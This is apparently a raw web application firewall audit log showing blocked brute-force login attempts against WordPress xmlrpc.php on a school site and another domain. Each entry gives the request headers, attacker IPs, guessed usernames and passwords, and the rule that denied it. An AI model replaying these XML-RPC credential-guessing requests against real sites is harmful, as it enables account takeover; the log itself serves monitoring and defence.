199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce44b100-E-- --ce44b100-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122773895174 5214 (- - -) Stopwatch2: 1749122773895174 5214; combined=3742, p1=451, p2=3116, p3=0, p4=0, p5=103, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce44b100-Z-- --6c8ca762-A-- [05/Jun/2025:18:27:19 +0700] aEF_F-th7G2xELALzPZdawAAANI 103.236.140.4 58574 103.236.140.4 8181 --6c8ca762-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6c8ca762-C-- wp.getUsersBlogs kresno Marketing2013_ --6c8ca762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c8ca762-E-- --6c8ca762-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122839977024 6017 (- - -) Stopwatch2: 1749122839977024 6017; combined=4209, p1=541, p2=3489, p3=0, p4=0, p5=107, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c8ca762-Z-- --f710bd4b-A-- [05/Jun/2025:18:28:19 +0700] aEF_U1wdJdhOudw5hdz_EQAAAIg 103.236.140.4 58724 103.236.140.4 8181 --f710bd4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f710bd4b-C-- wp.getUsersBlogs kresno kresno@2001 --f710bd4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f710bd4b-E-- --f710bd4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122899282130 6306 (- - -) Stopwatch2: 1749122899282130 6306; combined=4387, p1=530, p2=3682, p3=0, p4=0, p5=104, sr=101, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f710bd4b-Z-- --6b9e7c66-A-- [05/Jun/2025:18:28:55 +0700] aEF_d-th7G2xELALzPZdmgAAAMY 103.236.140.4 58846 103.236.140.4 8181 --6b9e7c66-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.135.71.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.135.71.161 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6b9e7c66-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix+++ --6b9e7c66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b9e7c66-E-- --6b9e7c66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.135.71.161 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122935124874 4621 (- - -) Stopwatch2: 1749122935124874 4621; combined=3594, p1=385, p2=3050, p3=0, p4=0, p5=93, sr=76, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b9e7c66-Z-- --5d50a866-A-- [05/Jun/2025:18:29:30 +0700] aEF_mirHpfaS2Cuwh8UKxwAAAFg 103.236.140.4 58898 103.236.140.4 8181 --5d50a866-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d50a866-C-- wp.getUsersBlogs kresno QWERT --5d50a866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d50a866-E-- --5d50a866-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122970626104 5265 (- - -) Stopwatch2: 1749122970626104 5265; combined=3793, p1=478, p2=3144, p3=0, p4=0, p5=100, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d50a866-Z-- --6a04b001-A-- [05/Jun/2025:18:30:30 +0700] aEF_1lwdJdhOudw5hdz_TAAAAI8 103.236.140.4 59020 103.236.140.4 8181 --6a04b001-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6a04b001-C-- wp.getUsersBlogs kresno manager --6a04b001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a04b001-E-- --6a04b001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123030258280 4737 (- - -) Stopwatch2: 1749123030258280 4737; combined=3473, p1=360, p2=2919, p3=0, p4=0, p5=110, sr=82, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a04b001-Z-- --7093cb37-A-- [05/Jun/2025:18:31:15 +0700] aEGAA1wdJdhOudw5hdz_XgAAAJE 103.236.140.4 59134 103.236.140.4 8181 --7093cb37-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7093cb37-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehManager123! --7093cb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7093cb37-E-- --7093cb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749123075267458 4973 (- - -) Stopwatch2: 1749123075267458 4973; combined=3717, p1=384, p2=3109, p3=0, p4=0, p5=135, sr=79, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7093cb37-Z-- --d2b65d37-A-- [05/Jun/2025:18:31:30 +0700] aEGAEirHpfaS2Cuwh8ULBwAAAEI 103.236.140.4 59170 103.236.140.4 8181 --d2b65d37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d2b65d37-C-- wp.getUsersBlogs kresno p@ssword --d2b65d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2b65d37-E-- --d2b65d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123090402282 4800 (- - -) Stopwatch2: 1749123090402282 4800; combined=3486, p1=408, p2=2906, p3=0, p4=0, p5=101, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2b65d37-Z-- --86881c73-A-- [05/Jun/2025:18:32:30 +0700] aEGATn-K7ToMdu-YSIJXewAAAAw 103.236.140.4 59348 103.236.140.4 8181 --86881c73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --86881c73-C-- wp.getUsersBlogs kresno aaaa --86881c73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86881c73-E-- --86881c73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123150604631 4077 (- - -) Stopwatch2: 1749123150604631 4077; combined=3118, p1=339, p2=2613, p3=0, p4=0, p5=97, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86881c73-Z-- --52dfe009-A-- [05/Jun/2025:18:33:30 +0700] aEGAiirHpfaS2Cuwh8ULKQAAAEE 103.236.140.4 59426 103.236.140.4 8181 --52dfe009-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --52dfe009-C-- wp.getUsersBlogs kresno foobar --52dfe009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52dfe009-E-- --52dfe009-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123210588070 5039 (- - -) Stopwatch2: 1749123210588070 5039; combined=3698, p1=461, p2=3063, p3=0, p4=0, p5=101, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52dfe009-Z-- --3e03f92a-A-- [05/Jun/2025:18:34:30 +0700] aEGAxuth7G2xELALzPZdugAAAMw 103.236.140.4 59578 103.236.140.4 8181 --3e03f92a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --3e03f92a-C-- wp.getUsersBlogs kresno 123111 --3e03f92a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e03f92a-E-- --3e03f92a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123270185754 8795 (- - -) Stopwatch2: 1749123270185754 8795; combined=4460, p1=941, p2=3335, p3=0, p4=0, p5=106, sr=94, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e03f92a-Z-- --f6686f29-A-- [05/Jun/2025:18:34:32 +0700] aEGAyOth7G2xELALzPZdvgAAANY 103.236.140.4 59588 103.236.140.4 8181 --f6686f29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f6686f29-C-- wp.getUsersBlogs kresno 1234%^&* --f6686f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6686f29-E-- --f6686f29-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123272218537 5694 (- - -) Stopwatch2: 1749123272218537 5694; combined=3833, p1=471, p2=3153, p3=0, p4=0, p5=121, sr=105, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6686f29-Z-- --32ba7c6f-A-- [05/Jun/2025:18:35:10 +0700] aEGA7uth7G2xELALzPZd3AAAAMg 103.236.140.4 59656 103.236.140.4 8181 --32ba7c6f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 159.89.224.46 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 159.89.224.46 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --32ba7c6f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin& --32ba7c6f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --32ba7c6f-E-- --32ba7c6f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749123310027404 6232 (- - -) Stopwatch2: 1749123310027404 6232; combined=4581, p1=479, p2=3780, p3=30, p4=34, p5=146, sr=94, sw=112, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32ba7c6f-Z-- --1adc443f-A-- [05/Jun/2025:18:35:19 +0700] aEGA9-th7G2xELALzPZd5AAAANU 103.236.140.4 59680 103.236.140.4 8181 --1adc443f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.135.71.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.135.71.161 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1adc443f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix1998 --1adc443f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1adc443f-E-- --1adc443f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.135.71.161 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749123319157733 4543 (- - -) Stopwatch2: 1749123319157733 4543; combined=3541, p1=358, p2=3004, p3=0, p4=0, p5=105, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1adc443f-Z-- --d6677150-A-- [05/Jun/2025:18:35:30 +0700] aEGBAlwdJdhOudw5hdz_ngAAAIw 103.236.140.4 59724 103.236.140.4 8181 --d6677150-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d6677150-C-- wp.getUsersBlogs kresno summer --d6677150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6677150-E-- --d6677150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123330161526 4690 (- - -) Stopwatch2: 1749123330161526 4690; combined=3503, p1=361, p2=2948, p3=0, p4=0, p5=111, sr=81, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6677150-Z-- --1a85812c-A-- [05/Jun/2025:18:36:30 +0700] aEGBPn-K7ToMdu-YSIJXzAAAABA 103.236.140.4 59870 103.236.140.4 8181 --1a85812c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --1a85812c-C-- wp.getUsersBlogs kresno matthew --1a85812c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a85812c-E-- --1a85812c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123390399351 3795 (- - -) Stopwatch2: 1749123390399351 3795; combined=2939, p1=296, p2=2498, p3=0, p4=0, p5=84, sr=69, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a85812c-Z-- --db38e060-A-- [05/Jun/2025:18:37:30 +0700] aEGBeuth7G2xELALzPZeQQAAANU 103.236.140.4 